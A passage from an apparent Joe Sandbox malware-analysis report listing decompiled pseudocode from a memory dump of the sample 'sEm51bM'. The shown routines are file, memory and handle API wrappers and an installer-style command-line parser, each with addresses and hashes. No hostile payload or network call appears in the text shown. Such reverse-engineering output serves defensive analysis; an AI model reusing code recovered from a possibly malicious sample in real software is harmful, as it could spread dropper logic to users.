                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0x328d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0x328d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0x328d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x328d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x328d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x328d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x328d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00324b66
                                                                                                                                                                                                                                            0x00324b74
                                                                                                                                                                                                                                            0x00324b98
                                                                                                                                                                                                                                            0x00324ba0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324bac
                                                                                                                                                                                                                                            0x00324ba4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324ba4
                                                                                                                                                                                                                                            0x00324b78
                                                                                                                                                                                                                                            0x00324b7e
                                                                                                                                                                                                                                            0x00324b84
                                                                                                                                                                                                                                            0x00324b8a
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00324FA1,00000000), ref: 00324B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: 281b97fca9a4ac510b6e029015833504f3ba8f3d92a2f43ecc44374d8604a49b
                                                                                                                                                                                                                                            • Instruction ID: b488bdad4e9e0610492c7c9863e20f2609a33241219414fb315812dc59dc1aa5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 281b97fca9a4ac510b6e029015833504f3ba8f3d92a2f43ecc44374d8604a49b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48F01231941B289E47739F39EC10652BBE8AB95361310492EA4AED2190DB30A44ACB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003266AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x003266b1
                                                                                                                                                                                                                                            0x003266ba
                                                                                                                                                                                                                                            0x003266c7
                                                                                                                                                                                                                                            0x003266bc
                                                                                                                                                                                                                                            0x003266be
                                                                                                                                                                                                                                            0x003266be

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00324777,?,00324E38,?), ref: 003266B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: e32c9073f4f60ba477ff6db7ee0216d7a8dd9fa3e0cbf941a273eaa58e78392a
                                                                                                                                                                                                                                            • Instruction ID: 5988ad0e127315b7cd5caf1f46805b2109cd32126b62960105bad860aebec5d8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e32c9073f4f60ba477ff6db7ee0216d7a8dd9fa3e0cbf941a273eaa58e78392a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCB09276222850476A2206317C2A95A2845ABC133ABE55B98F032D01E0CA3EC846D004
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00324CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00324caa
                                                                                                                                                                                                                                            0x00324cb1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00324CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: 13c64b4ccbc97ef0fc5ae0977af05fde7be9beaf2eea03fe3dceb042e61b912a
                                                                                                                                                                                                                                            • Instruction ID: b5fbcfca56fc6b710200df249e4db6caf38cc0c4a632a8de7ba3c4ef120a9d67
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13c64b4ccbc97ef0fc5ae0977af05fde7be9beaf2eea03fe3dceb042e61b912a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22B0123204420CBBCF111FC2FC09F853F1DE7C4761F144000F60C450508A7294118696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00324CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00324cc8
                                                                                                                                                                                                                                            0x00324ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: 41cc91dc35d877aa23598ea347af96abdc98804315c248b20d425d3d08cd82be
                                                                                                                                                                                                                                            • Instruction ID: 15c82930515a71d7fe90c0546f67ee116349dd0cc9e2046dc235919d12003a67
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41cc91dc35d877aa23598ea347af96abdc98804315c248b20d425d3d08cd82be
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78B0123100010CBB8F111B42FC088453F1DD7C0360B004010F50C410218B3398128585
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00325C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E00326CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                            													_t177 = _t177 + 1;
                                                                                                                                                                                                                                            													_t202 = _t202 + 1;
                                                                                                                                                                                                                                            													_t157 = 2;
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												if(_t213 != 0) {
                                                                                                                                                                                                                                            													_t163 = 1;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t213 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L131;
                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                            								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                            								_t69 = _v272;
                                                                                                                                                                                                                                            							} while ( *_t69 != 0);
                                                                                                                                                                                                                                            							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                            								E00326E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                            								asm("int3");
                                                                                                                                                                                                                                            								_push(_t221);
                                                                                                                                                                                                                                            								_t222 = _t223;
                                                                                                                                                                                                                                            								_t71 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                            									0x4f0 = 2;
                                                                                                                                                                                                                                            									_t75 = E0032597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E003244B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                            									 *0x329124 = E00326285();
                                                                                                                                                                                                                                            									_t75 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								return E00326CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										_t79 = _v268;
                                                                                                                                                                                                                                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                            											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                            											if(_t83 == 0) {
                                                                                                                                                                                                                                            												_t202 = 0x521;
                                                                                                                                                                                                                                            												E003244B9(0, 0x521, 0x321140, 0, 0x40, 0);
                                                                                                                                                                                                                                            												_t85 =  *0x328588; // 0x0
                                                                                                                                                                                                                                            												if(_t85 != 0) {
                                                                                                                                                                                                                                            													CloseHandle(_t85);
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												ExitProcess(0);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E0032667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E0032667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E00325C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E00321680(0x328c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E0032667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E0032667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0x328a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E00325C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0x328b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0x328a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E00321680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E0032658A(_t218, 0x104, 0x321140);
                                                                                                                                                                                                                                            																if(E003231E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0x328a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0x328a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0x328a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0x328a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0x328a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0x329a2c = 1;
